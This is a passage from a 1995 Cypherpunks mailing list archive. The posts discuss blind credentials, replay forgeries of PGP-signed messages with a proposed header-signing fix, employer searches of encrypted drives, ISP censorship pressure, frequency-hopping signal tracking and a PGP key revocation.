anyone from claiming they are running the OFFICIAL cpunk FAQ or whatever as long as there is no OFFICIAL cpunk management. what, is someone gonna sue? heh. no one has a right to complain!! why do I have to reiterate this obvious point? the sword cuts both ways. or, that communication path is full duplex, so to speak. From hfinney at shell.portal.com Thu Dec 28 23:37:40 1995 From: hfinney at shell.portal.com (Hal) Date: Fri, 29 Dec 1995 15:37:40 +0800 Subject: blind validation Message-ID: <199512290144.RAA28654@jobe.shell.portal.com> Those are very interesting thoughts Alex Strasheim posted about blind validations. The issue of people handing out copies of their validations ("credentials" is the term Chaum uses) can be significant. Chaum's way around it was basically to have some mechanism to give each person a unique number of some special form. There doesn't have to be any agency who knows what number each person has (in fact, there isn't, in his scheme), but there is a mechanism to assure that one person does not get two numbers. This is sometimes loosely referred to as an "is-a-person" credential (although in this specific context it is not actually a credential, just an identifier). One way to achieve the goal would be to make each person give a thumbprint, or some other biometric identification, in exchange for giving them the is-a-person credential. Another way would be to use conventional ID, making sure their credential is blinded. Then, the blind validations are mathematically structured to be linked to the identity number. Only someone who has a specific identity number can show a specific blind validation. The idea here is that this addresses the copying-validation problem because a person would not only have to give away the specific validation, but also his identity number. This would in effect let the other person masquerade as the first, and any bad things he did would come back to hurt the person who gave away the data. You can't just walk away as in a totally uncontrolled blind signature system because of the linked nature of the credentials, and because you only get one identity number. So the result in effect is to make it difficult to give away just a validation, without also giving away the ability to act as you. Here is an idea about another way to achieve the same thing, closer to Alex's example: Alice gets a blind validation as Alex describes based on a simple blind signature. (Alice hands a blinded number to Bob, he signs it, Alice unblinds it, and uses the resulting signed number as the validation to, say, access Bob's files.) We add that Alice puts, say, $100 into "escrow", encrypting it with the secret number and putting it on some public server. She proves to Bob that she has done this using cut and choose. Now if Alice gives away her secret number, anyone using it will be able to access Bob's files, but they can also get the $100. So now it costs something for Alice to give away her secret. (There are some major problems with this idea, the worst being that Alice can extract and spend the $100 right after proving to Bob that she is doing what she said, and before publishing her number. Maybe someone could think of some fixes.) Hal From ecarp at tssun5.dsccc.com Thu Dec 28 23:50:17 1995 From: ecarp at tssun5.dsccc.com (ecarp at tssun5.dsccc.com) Date: Fri, 29 Dec 1995 15:50:17 +0800 Subject: Employer Probing Precedents? Message-ID: <9512272351.AA27795@tssun5.> > From owner-cypherpunks at toad.com Wed Dec 27 17:48 CST 1995 > Date: Wed, 27 Dec 1995 16:51:41 -0500 > Subject: Employer Probing Precedents? > To: cypherpunks at toad.com > From: "Jason D. Livingood/WSC"@hks.net > X-Server-Version: Cactus-Serv 1.5 > > -----BEGIN PGP SIGNED MESSAGE----- > > To Whom It May Concern: > > I was curious as to where I might find some electronic freedom legal > precedents. If, for example, an employer was planning to probe file systems on > PCs in the off-hours and employees began encrypting their hard drives, what > legal precedents would support the employees or would support the employer in > blocking the encryption? Try www.eff.org. I have a partition on my HD that is routinely encrypted. When asked about it, my response was that I was acting to protect company confidential material and company assets. From dlv at bwalk.dm.com Fri Dec 29 00:14:52 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Fri, 29 Dec 1995 16:14:52 +0800 Subject: A weakness in PGP signatures, and a suggested solution (long) Message-ID: I've been engaged in a lively debate with a few members of the cypherpunks mailing list about forgeries that are hard to repudiate even if PGP signatures are used. One of the participants suggested that I post a summary to alt.privacy.pgp and sci.crypt, which is just what I'm doing. (My apologies to the mail.cypherpunks readers who already saw much of this once.) I'll illustrate the problem with several scenarios of forgeries. (It's funny that earlier today I was showing a friend how easy it is to post forgeries. She seemed suitably impressed. :) Scenario 1: Bob once sent Carol an e-mail that looked like this: ----------------------------------------------------------------------- From: Bob at boxb To: Carol at boxc Date: 25 Dec 1965 Subject: Carol, we're history Message-ID: <111 at boxb> ----BEGIN PGP SIGNED MESSAGE---- I no longer wish to go out with you. Merry Christmas! ----BEGIN PGP SIGNATURE---- Version 2.6.2 12341234... ----END PGP SIGNATURE---- ----------------------------------------------------------------------- Carol can forge an e-mail to Alice that looks like this: ----------------------------------------------------------------------- From: Bob at boxb To: Alice at boxa Date: 25 Dec 1995 Subject: Alice, we're history Message-ID: <222 at bobb> ----BEGIN PGP SIGNED MESSAGE---- I no longer wish to go out with you. Merry Christmas! ----BEGIN PGP SIGNATURE---- Version 2.6.2 12341234... ----END PGP SIGNATURE---- ----------------------------------------------------------------------- We assume that it's easy for Carol to forge the RFC 822 headers to make it look like the e-mail came from Bob. That's why many of us use digital signatures. The signed portion of Bob's original e-mail did not state that the message is addressed to Carol (e.g., "Dear Carol"). Alice will probably verify that the signature matches Bob's private key and assume that the e-mail is authentic and has been sent to her by Bob. To repudiate the e-mail, Bob might have to point out that the "Received:" headers differ from his usual e-mails, without relying on PGP. In fact, the presense of his verifiable signature would create more of a presumption of authenticity of Alice's part. Scenario 2: Bob sends the same e-mail as above to Carol. David, a rogue sysadmin, gets a copy of the e-mail, forges the same e-mail as above to Alice. Scenario 3: Bob sends a signed e-mail to Alice. Alice sees it in her newsfeed, forges a Usenet article, makes it look like it came from Bob, and includes the body of Bob's e-mail as the body of the Usenet forgery. Usenet forgeries are easy. Again, if the signed text happens to be suitable, then Bob will have difficulty repudiating the forgery. He won't not be able to use the PGP signature, which will in fact verify. Hopefully, he'll be able to point out that the RFC 1036 Path: header is different from his usual header (which may not be the case). Many Usenet readers would be unconvinced and Bob's reputation would be damaged. Scenario 4: Bob posts a signed Usenet article to alt.sex. Alice forges a usenet article in Bob's name to misc.kids, recycilng the signed body, which would probably be considered inappropriate for misc.kids. Same result as #3. Scenario 5: Bob posts a signed Usenet article to some innocuous newsgroup. Alice reposts the same body in a forgery in Bob's name. The forgery can be cross-posted to numerous "inappropriate" newsgroups ("velveeta"), or multi-posted ("spam"). Certain rogue self-apponited net.cops forge cancels for all copies of Bob's article, including the original. (They are a bigger menace than the forgers :) (As several people know, I have been a victim of some of the above-described kinds of forgeries.) I think the underlying problem is that the way PGP signatures are used by most people, they validate a text, but allow it to be quoted out of context in an e-mail or Usenet forgery. I suggest to the kind folks working on PGP 3 that there should be a standard protocol to include within the signed portion the information on when and for whom this text is written: i.e. the list of e-mail recipients and/or Usenet newsgroups, which could be easily compared with the RFC 822/1036 headers of an e-mail/Usenet article. Perhaps there could be a new option for PGP to look _outside_ the signed block and match the headers with what's inside the block. For example, suppose the signature block says: this text was written by alice at zog.org, posted to alt.sex and alt.sex.banal and e-mailed to bob at masons.com. Suppose PGP is asked to check the signature in a file that purports to be a e-mail or a Usenet article and has some headers before the signed portion. If there is a list of To: recipients, and it includes someone other than the recipients listed within the signed block; or if there is a Newsgroups: header, and it includes newsgroups not listed within the signed portion; then the input is bogus. For compatibility with the existing software, if the signed block doesn't include this info, then this checking should't be done, of course. After I posted the above suggestion to cypherpunks, one very respected member of that list informed me that "the security multiparts standard (RFC 1848) includes a provision for signing the headers as well as the body of a message. The security multiparts can be used with PGP, and there is even an Internet Draft for it (draft-elkins-pem-pgp-02.txt), but there is not yet consensus for adopting this as a standard on the pgp-mime mailing list." I hope my examples will convince some that present practice of signing pieces of text which can be quoted out of context in a forgery is just not enough. We need to have an easy way to sign the headers without resorting to mine. --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From sandfort at crl.com Fri Dec 29 00:24:42 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Fri, 29 Dec 1995 16:24:42 +0800 Subject: cool cpunk project proposal: "cpunk approved" logo In-Reply-To: <199512290136.RAA05099@netcom17.netcom.com> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Thu, 28 Dec 1995, "Vladimir Z. Nuri" wrote: > you totally misunderstand my message. this is NOT an "official" project, > it is NOT a cooperative project. I am proposing that INDIVIDUALS undertake > the project under the cypherpunk name. no one has a right to complain > after all, when there is no *official* cypherpunk standard. really, I do > LOVE anarchy. Hey Larry, go for it. I'm sure it will be every bit as successful as "Cypherwonks." > . . . I of all people understand cypherpunk psychology . . . Several of them, in fact. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From tcmay at got.net Fri Dec 29 00:40:52 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 29 Dec 1995 16:40:52 +0800 Subject: Employer Probing Precedents? Message-ID: (I've purged the four accumulated names off the cc: list. I urge other to do the same, as the headers are getting clogged up, and people are often getting two copies.) At 10:59 PM 12/28/95, Mike McNally wrote: >Another vaguely-related concept is that of tenants' rights to a degree >of security in rental property. Actually, tenants have nearly absolute rights of privacy. Landlords cannot enter the premises whenever they wish, conduct bed checks, sniff for marijuana, etc. However, landlords are also not held liable (in most cases) for the illegal acts of tenants. (Obvious exceptions include recent developments with "crack house" laws, or where the tenants are using a house as a base of operations, such as shooting from windows...and even then the landlord's responsibility is to cooperate with law enforcement: he is not liable for the shootings, nor for anything else that he could not have reasonably known about or controlled.) Ditto for hotel owners. I wrote a long essay for the Cyberia list using these examples as jumping off points for a view of law in cyberspace. Basically, that ISPs be treated as hotel owners. Not liable for the misdeeds of customers in the "rooms" (in realspace hotels, or in cyberspace). However, corporations aren't given the luxury of disassociating themselves from the actions of their employees. (Contract workers are a further issue, and the issue of whether they supply their own tools/computers, workspace, etc., enters in.) I maintain that my employees are beholden to me as to what they run on their computers. They can always choose not to work for me. (And the same applies to hotels, actually. Were a hotel to have stringent rules on in-room behavior, such as the YMCAs and religious retreat hotels have, then customers have little right to complain about bed checks, mixed sex bans, etc. That most hotels have no such rules says more about where the Schelling points are than it does about the efficacy of rules and laws. >Though the ownership==control equation works sometimes, and is >appealing to reason, I don't think things are always so simple. Nor do I think things are always simple. But it pays to think about proposed laws from a perspective of maximizing personal choice. (The choice of the owner of a hotel, or computer, or car, to establish the basis for trading use of his property for other considerations.) --Tim May We got computers, we're tapping phone lines. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 - 1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From anonymous-remailer at shell.portal.com Fri Dec 29 00:53:50 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Fri, 29 Dec 1995 16:53:50 +0800 Subject: Ecash graphic images? Message-ID: <199512290458.UAA15779@jobe.shell.portal.com> Could anyone provide some pointers to a gif or jpeg file containing good-looking ecash coins? I would like something larger and more detailed than the "we accept ecash" you see everywhere. Thanks very much. From tcmay at got.net Fri Dec 29 01:45:36 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 29 Dec 1995 17:45:36 +0800 Subject: Compuserve is Not "Censoring": Look to Governments for the Cause Message-ID: At 5:17 AM 12/29/95, Bill Humphries wrote: [much good stuff, with which I agree, elided] >Support your local ISP. This simple line is very, very important! Consider two extremes: * Extreme 1--Internet access via Compuserve, AOL, or other organizations striving for a "global presence." Every country these organizations does business in puts pressure on them to control content, supply names of contacts, etc. Singapore bans 200 newsgroups, Iraq executes the local sysops, the U.S. jails the corporate executives for allowing "alt.barney.die.die.die" to corrupt the morals of young people. * Extreme 2--"Individuals on the Net directly." Joe User has a box on the Net. Albania is powerless to hassle him. France cannot seize his computer. (If he's in Country A, that country may harass him, but if he connects to accomodation addresses in other countries, even this is lessened or avoided completely.) Small ISPs are closer to Extreme 2, as they have no presence in Albania, Iran, France, Chad, or other states desiring to control content. For small U.S. ISPs, their main worry is what the U.S. government will say they must do. Small, local ISPs may of course be more prone to other kinds of pressure. But it is my experience that small services are less likely to adopt speech codes and other draconian behavioral laws than are larger and "more responsible" (:-}) services. Jay Campbell, one of the sysops at my ISP, "got.net," may want to give his perspective, if he sees this. I see a positive longterm trend toward people connecting through smaller, more local services. Hard to enforce Albania's laws on 20,000 small Internet connection services. Even longer term, the anarchy of the Net will reach its true flowering when millions of users are directly connected. How ya gonna keep em down when they're directly on the Net? --Tim May We got computers, we're tapping phone lines. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 - 1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From dsmith at midwest.net Fri Dec 29 01:54:23 1995 From: dsmith at midwest.net (David E. Smith) Date: Fri, 29 Dec 1995 17:54:23 +0800 Subject: Proxy/Representation? Message-ID: <199512290017.SAA00616@cdale1.midwest.net> At 05:07 PM 12/28/95 GMT, lull at acm.org wrote: >> The question is: how do the current software packages handle representatives >> and proxies for a given is-a-person? Using PGP as an example, I can't sign >> a message with Helen's key. And a message signed with my key won't hold >> as much weight because "Dave" is not "Helen." And if every message I send >> on behalf of Helen has to be followed up by a message from Helen stating >> "yes, Dave may act on my behalf for this instance" then much of the point >> of the proxy process is lost. (i.e. the reduction of Helen's workload etc.) >I would think a power-of-attorney, signed by Helen, would do the >trick. This would normally be valid for some pre-defined period, for >a pre-defined set of transactions, and would not have to be generated >anew each time. That's basically the situation in the wonderful world of paper. What I'm interested in is how to handle the power-of-attorney case in the world of bits. (I've been using PGP as my example, but I'm certainly open to software that handles it better; suggestions?) Even if Helen signs my PGP key, that doesn't do anything other than connect us in the almighty Web of Trust (for whatever that's really worth). dave ----- David E. Smith, c/o Southeast Missouri State University 1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814 PGP ID 0x92732139, homepage http://www.midwest.net/scribers/dsmith/ Dec15-Jan15: (618)244-3340/2209 Perkins, Mt Vernon IL 62864 From frenchie at magus.dgsys.com Fri Dec 29 01:56:18 1995 From: frenchie at magus.dgsys.com (J.Francois) Date: Fri, 29 Dec 1995 17:56:18 +0800 Subject: Strategic Investments .... In-Reply-To: <199512290101.UAA12519@atlanta.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- While browsing my mail I noticed that mjsus at atlanta.com wrote: > > This can be some interesting ..... > > > **************************************************************************** > ********** > > GLOBAL STRATEGIC SYSTEMS NEWSLETTER > > December, 1995 > > Strategic Management Investments, Asset Allocation, Evaluation and Review Look, I aint no crypto expert or nuthin', but I have spent a lot of time looking for the algorithm or key to figure this thing out and I can't find it. I got whole ROOMS of cpu's crankin' on this one, I even called uncle Al at Fort Meade and he called back and said, "....dunno...must be some newfangled stego or something, I'll call you back". Was this really a newsletter post or do I need to go back to codebreaker school????? - -- =====================PGP Encrypted Mail Preferred======================== PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. As soon as any man says of the affairs of the state " What does it matter to me? " the state may be given up for lost. J.J.Rousseau - The Social Contract =========================No Unsolicited Email============================ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: 355/113 -- Not the famous irrational number PI, but an incredible simulation! iQCVAgUBMONhDrbmxeO+s+1xAQEDvAQAjWwk9q48ZrOEzrpmb+OkTpwjkyqamfgU Z4KeC46s9GNC5QlW8JdiCfjmmwPFr/skyaGDFEH93V9Em6pl6tPjGI1KogOq5Xon RJGdconUUwgP8jRKaM3e+uXYCIurQDSwtUVCS0M4jnHobmQjhZ6SfGFHFMdJssEH dEplAfQy46Y= =odMQ -----END PGP SIGNATURE----- From m5 at dev.tivoli.com Fri Dec 29 01:56:40 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Fri, 29 Dec 1995 17:56:40 +0800 Subject: Employer Probing Precedents? In-Reply-To: <9512282259.AA12970@alpha> Message-ID: <9512290129.AA13043@alpha> Eric Murray writes: > > Another vaguely-related concept is that of tenants' rights to a degree > > of security in rental property. > > Wrong model. You don't pay rent to your employer for your computer. I don't think you read the rest of my note. I don't think it's completely clear that I don't pay rent to my employer for my computer. > Does this allow for employees keeping encrypted material on their > company computer? I don't think so, or rather I think that it's in > the company's rights to ask for the encryption keys under certain > circimstances- employee leaving company, employee suing company, etc. > If you've kept something damaging on your employers machine, you better > delete it before the situation gets so bad that they'll be going through > your files. And still this reminds me of tenants property rights. (And I do agree the connection is rather thin, but work with me here.) An apartment manager can get in to an apartment for a variety of contractually set reasons. Maybe what all this means is that, at some point, employees will begin demanding explicit contracts w.r.t. computer system policies, just like for basic stuff like salaries & benefits. Indeed, I know of several cases where engineers being courted demanded and got perks like window offices or an extra few PTO days in their initial offer; why not a contract for what is and isn't "mine" on the network? (In that light, it'd probably develop that those without such a contract would be left on poor legal ground.) (And we'd better stop before Perry yells at us :-) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From ericm at lne.com Fri Dec 29 01:57:27 1995 From: ericm at lne.com (Eric Murray) Date: Fri, 29 Dec 1995 17:57:27 +0800 Subject: Employer Probing Precedents? In-Reply-To: <9512282259.AA12970@alpha> Message-ID: <199512290107.RAA27776@slack.lne.com> > Scott Brickner writes: > > The notion that, simply because you're wearing a uniform owned by your > > employer, you're subject to physical search at the employer's > > discretion is laughable. The difference between this and searching the > > computer on one's desk differ only in degree, IMO. > > Another vaguely-related concept is that of tenants' rights to a degree > of security in rental property. Wrong model. You don't pay rent to your employer for your computer. Your deskside workstation is just like your desk that it sits beside when it comes to employer/employee rights. While a prudent employer won't go through your desk unless it's required, they do have the right to do so. Many companies have stated policies as to when they can go through your desk; at places like IBM it is very restrictive as to when managers can go through your desk. This is merely smart business- giving people trust is the best way to make them responsible. All companies should also have written policies that state what parts of employee's computers/hard drives/home directories/email etc. is considered private, and under what circimstances management is allowed to look through those areas. I managed to sneak a policy like this into the computer security policy I wrote for a previous employer. Again, the policy should strictly limit what snooping through employee's files the company will do. Any company that goes through it's employee's files with less than sufficient justification is going to generate a lot of negative reputation, and fast. Does this allow for employees keeping encrypted material on their company computer? I don't think so, or rather I think that it's in the company's rights to ask for the encryption keys under certain circimstances- employee leaving company, employee suing company, etc. If you've kept something damaging on your employers machine, you better delete it before the situation gets so bad that they'll be going through your files. If you want to keep something secret, put it on your own machine. -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From mjsus at atlanta.com Fri Dec 29 01:58:02 1995 From: mjsus at atlanta.com (mjsus at atlanta.com) Date: Fri, 29 Dec 1995 17:58:02 +0800 Subject: Strategic Investments .... Message-ID: <199512290101.UAA12519@atlanta.com> This can be some interesting ..... **************************************************************************** ********** GLOBAL STRATEGIC SYSTEMS NEWSLETTER December, 1995 Strategic Management Investments, Asset Allocation, Evaluation and Review Strategic Management System (SMS) investments are long-term investments and total ROIs of these investments can only be evaluated after several years from the initial decisions and activities. However, this does not mean that the organization can not evaluate many specific elements and short-term projects of the whole SMS project separately and obtain some good feedback and information about the short-term performance within one year or sooner. The implementation of an overall SMS can be divided into small development projects such as back-up system, customer complaint processing, environmental communication and employee recruiting system development. Specific Return on Investment and other financial and cost objectives can be established for these projects, and they can be evaluated and monitored on a quarterly and/or annual basis. However, the main strategic objective, the aim of the SMS, can only be achieved, when all elements of the SMS have been implemented, integrated and operated effectively. To justify, specific investment decisions, both short-term and long-term financial indicators can be used, which can satisfy many passive investor's requirements to commit to the long-term investments. Depending on the field of technology and business complexity, the organization can spend up to 30 % of its annual revenue in the strategic investments including system development and any new technology R&D activities. In some cases, costs can be higher. What is the portion of this amount that is invested in the development of the SMS? With some rough information, it was possible to calculate that about 25 % of the total annual strategic investment was spent in one ISO 9000 quality system development. This 25 % was invested in organizational capability, improved quality assurance and additional equipment, manpower and machine acquisitions. Using the above estimation, the management estimated that it had invested up to 7.5 % of its annual revenue in the strategic management system development activities. The major portion of this investment can be used in tactical, short-term development projects such as returned goods processing and test and equipment control, where the investment performance data can be obtained faster; and the rest of the SMS investment can be used for project/program management and coordination, organizational restructuring, responsibility and authority definition, document and data control and any other supporting system development activities, the financial monitoring can be more difficult. The major cost categories in the SMS development projects are: 1. development, implementation and training time (manpower excluding external training, consulting and assessment activities), 2. equipment and machine acquisitions, 3. materials such as office supplies and 4. external project activities. Investments in the development of any SMS can be either tactical or strategic. The financial performance of the tactical investments is very often much easier to evaluate than the evaluation of the long-term investments that may not have specific and measurable investment objectives and/or the accounting information to evaluate the performance against any specific objectives which can be difficult to obtain. It is possible to develop specific budgets for each element of the SMS development project and identify the sources of development benefits and cost reductions that can be used for evaluating the financial performance of each project. The financial performance (including the maintenance of development budgets and the achievement of investment performance ratios such as Return on Investment and Investment Payback Period) can be reviewed and evaluated on a quarterly and annual basis. Any consolidated investments in the whole Strategic Management System development and the SMS development progress can be reviewed in the annual Strategic Planning activities by the top management in the same way as any specific tactical investments can be reviewed and analyzed in the departmental level to identify any problem areas, any potential problems and to determine and initiate necessary corrective and/or preventive actions to achieve or maintain all financial performance objectives and targets. The organization should manage its investments in the SMSs such as ISO 9000, ISO 14000 or Information Security Systems as it manages all its capital expenditures or any investments in financial instruments such as stocks and bonds. These investments have to be controlled, managed, reviewed and improved upon on an on-going basis by the managerial level. Each element of the SMS development can have its own budget and budget responsibility. The organization may establish its own unique accounting system for each SMS development project including specific cost and expenses categories, and identifying specific sources of financial benefit information that can be used to calculate financial ratios. Any over spending or other negative financial performance issues can be brought to the attention in the management reviews, which may lead to the initiation of necessary corrective and preventive actions. It is easy to overspend and waste financial resources such as the waste of manpower without adequate accounting, record keeping and monitoring systems and methods. The utilization of actual financial performance measures helps the organization also to see actual financial benefits from the strategic investments and to justify additional SMS development activities. However, we still have the question: "How much should the organization invest in any specific SMS to satisfy its future business requirements?" From pratt at cs.Stanford.EDU Fri Dec 29 01:58:18 1995 From: pratt at cs.Stanford.EDU (Vaughan Pratt) Date: Fri, 29 Dec 1995 17:58:18 +0800 Subject: Fwd: Re: Fwd: Re: FH radios [Dave Emery] [Vaughan Pratt] In-Reply-To: <9512270551.AA23874@pig.die.com> Message-ID: <199512290049.QAA28702@Coraki.Stanford.EDU> That is not what Mr Shannon says, Shannon's law relates date rate, bandwidth and signal to noise ratio - the "channel capacity" of 26 mhz of spectrum is determined by the signal to noise ratio in the 26 mhz channel and ranges from much less than 26 mbs to several times that rate depending on the signal to noise ratio (and of course how clever the modulation technology is at exploiting it). Witness a 28.8 kb modem which stuffs 28.8 kb into less than 3.2 khz given about 32 db gross SNR. Oops, mega*samples*, not megabits, how embarassing. I agree with your numbers, I was low by an order of magnitude or so on the quantity of data one would need to examine to reconstruct the message. But now that I think about what 902-928 MHz looks like in practice, I think I underestimated how hard things could get. If you're just trying to track a frequency-hopping signal where the rest of the power in the band is some mix of Gaussian noise and non-hopping signals, the carrier should be clearly visible as a spike hopping around in the band. As soon as you have two or more frequency-hopping signals however, keeping track of which carrier is which as they hop around looks *much* harder. If they hop at discernibly different times then you can correlate a carrier that disappeared with the one that appeared elsewhere at the same time. This easily described and implemented approach breaks down when two or more signals hop at the same time. Here you might try to associate some sort of signature with each signal to allow you to pair up the new carriers with the old, but you'd have to know more about the situation to say what signatures would be good. Similarly a single spread-spectrum signal should be easy to pick out, but multiple such sounds like an even bigger headache than multiple hoppers. But even the security of mathematical crypto is mostly unproven as of yet - we merely think things are difficult to compute because we don't know an easy way to do it, not because there is a clear proof that is true. Yes, this is a very important point (but presumably an obvious one to cypherpunks, maybe I should subscribe). Worse, even if we *could* prove a certain protocol secure, the proof will typically apply only to the protocol and not to any particular message transmitted using that protocol. There is a very big difference between proving the absence of a fast decryption algorithm for a given encryption scheme and proving that every message so encrypted is secure. One might call this distinction existential security vs. universal security. A universally T-secure channel is one for which every message is secure from all T-bounded attacks (algorithms taking time at most T expressed as a function T(n) of the length n of the message). An existentially T-secure channel is one such that for every T-bounded attack there exists an infinite set of messages all of which are secure from that attack, though not necessarily the same messages as you vary the attack. (As a practical matter it would be more useful to replace the function T by a fixed long duration such as a googol seconds, provided this could be achieved with messages of size at most say a kilobyte, a point of view advocated by e.g. Leonid Levin. This requires taking the state-symbol product of the computational model into account when measuring computational complexity since constant factors can no longer be neglected; here Kolmogorow complexity is a particularly natural setting. This still only addresses algorithmic attacks; for security against hardware attacks one should also appeal to limits set by physical constants like c and h-bar.) The danger is that someone will eventually demonstrate existential security for a protocol, the proof will as usual be trumpeted in the New York Times, and it will be interpreted by many as proving universal security. An intermediate notion is that of a uniformly existentially secure channel: there exist some messages secure from all attacks. But if those messages can be efficiently identified then such a channel can be converted to a universally secure channel simply by only transmitting secure messages. Modulo the identification problem, this shows that it is no easier to come up with a uniformly existentially secure protocol than a universally secure one. With a few exceptions, arising in e.g. quantum cryptography, we don't even have existentially secure protocols yet, let alone universally secure ones. Vaughan Pratt From cadams at fly.HiWAAY.net Fri Dec 29 02:00:40 1995 From: cadams at fly.HiWAAY.net (Chris Adams) Date: Fri, 29 Dec 1995 18:00:40 +0800 Subject: A weakness in PGP signatures, and a suggested solution (long) In-Reply-To: Message-ID: <4bvub2$4b3@fly.HiWAAY.net> -----BEGIN PGP SIGNED MESSAGE----- Newsgroups: alt.security.pgp,sci.crypt,mail.cypherpunks In article , Dr. Dimitri Vulis wrote: >I'll illustrate the problem with several scenarios of forgeries. The easy way around this if you think this might happen is just to put a line at the top of your signed message stating where the message is supposed to go. Then if people see it elsewhere, they can figure out that something is amiss. See above for an example. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMON8jiJFQNhhNdm5AQHCFgf9GbaCMWRckNQA4y9Av8e0nigYP0GpGxEh 0A2w9dvSJBmuzaMJ8QxERieGVE61U3+VXOLgssdWXZsnqOPBNKk+2hYyx+vatFL9 XKETZV245acLo4VMNNxV4m/hGteuHUb4oQEKCWHwylyh/f9wfvx+ZTjvTyd8RiqQ nwcpRPhRA4FozOaVNbjZw/A4nmvxq5I3gg3yMet3vfMWKdhLIy4gsvuhRm/asTGo BUSw8PIJQbFbrXpoyWsP/sWGDa5tjN7Z05HnX9yU3OIa0uk6K6e2xKVJUo3G2Jso Kts/pw2hqDBJ0K8XFsnicmncnUDz+FGNKqyCGsSFY8TlaVowpNFZJw== =VpDg -----END PGP SIGNATURE----- -- Chris Adams (cadams at HiWAAY.net) Finger for PGP public key "So, if anybody wants to have hardware sent to them: don't call me, but instead write your own unix operating system. It has worked every time for me." - Linus Torvalds, author of Linux (Unix-like) OS From fricke at roboben.engr.ucdavis.edu Fri Dec 29 02:50:48 1995 From: fricke at roboben.engr.ucdavis.edu (Light Ray) Date: Fri, 29 Dec 1995 18:50:48 +0800 Subject: FW: your financial transactions posting (fwd) Message-ID: ---------- Forwarded message ---------- Date: Fri, 29 Dec 1995 00:02:50 -0800 From: Bud Aaron To: "'privacy at ftc.gov'" Cc: "'hwg-business at daft.com'" Subject: FW: your financial transactions posting ---------- From: Greg Metcalfe[SMTP:biosphere at proaxis.com] Sent: Thursday, December 28, 1995 9:35 PM To: bud at checkmaster.com Subject: your financial transactions posting Bud, I've seen some well thought out messages in the commercial transactions listserver, but you are the first that I've seen with real numbers. Would you do us all a favor and make sure that you get some of this information to the privacy at ftc.gov discussion? I hope I'm not impertinent for asking. But numbers are probably our only hope. The gov has never really been into quantitative thinking... TIA --- Greg Metcalfe | The secret is getting E-mail biosphere at proaxis.com | enough sleep. URL http://www.proaxis.com/~biosphere | Usually. The following is a copy of the information mentioned above: The following article is quoted directly from Bank Technology News "Are Internet Security Fears Unfounded? Just how safe is the Internet? Pretty darn safe, according to Forrester Research, Inc., Cambridge, MA. Forrester predicts Internet fraud will occur far less frequently than current rates of fraud with cellular telephones, toll calls and credit cards (see chart). Cellular telephone fraud costs the phone industry almost $20 per $1000 in revenue, Forrester says, and toll-call fraud eats up $16 per $1000 in revenue. Meanwhile, credit-card fraud cost MasterCard almost $1.50 per $1000 in revenue in 1993. In contrast, Forrester says companies can expect to lose only $1 per $1000 of transactions on the Internet. Forrester's contentions on the safety of the Internet are backed up by some of the judges in this year's Best of the Newest bank technology survey. While many of the judges expressed concern over security issues, quite a few were also confident that the Internet will become a stalwart transaction system. See page one for further analysis of all the newest banking technologies." The chart accompanying this article shows the fraud levels in graphic form. You folks keep making drafts as a collection system seem more and more attractive. The fact that drafts MUST be deposited (not just cashed) and that the bank is going to want to know the depositor quite well means that tracking is excellent. The requirement added by the FTC that those whose accounts are being drafted must be notified by mail makes the system even safer. Let me add this - some level of security is obviously needed but regardless of the level of security, fraud will occur. All of these arguments for high levels of security remind me of the need for virus protection. Yes, virus attacks are real but virus protection vendors certainly make money by raising greater fear than may be realistic. Bud Aaron bud at checkmaster.com http://www.checkmaster.com/internetchecks/ The privacy list is run automatically by the Majordomo list manager. Please mail questions/problems to owner-privacy at ftc.gov From prz at acm.org Fri Dec 29 03:03:34 1995 From: prz at acm.org (Philip Zimmermann) Date: Fri, 29 Dec 1995 19:03:34 +0800 Subject: Revocation of Zimmermann's fossil key Message-ID: <199512290844.IAA02565@maalox> -----BEGIN PGP SIGNED MESSAGE----- To whom it may concern: I have revoked my oldest PGP key, keyID FF67F70B, user ID "Philip R. Zimmermann " which should no longer be used. Instead, use my newer key, keyID C7A966DD, with user ID "Philip R. Zimmermann " The new key has been distributed with all PGP versions since version 2.3a in 1994. My old email address at the sage site will soon disappear, so I'm revoking my old key. I keep getting mail at my old address at sage because people get that old address from my old key. I can't just 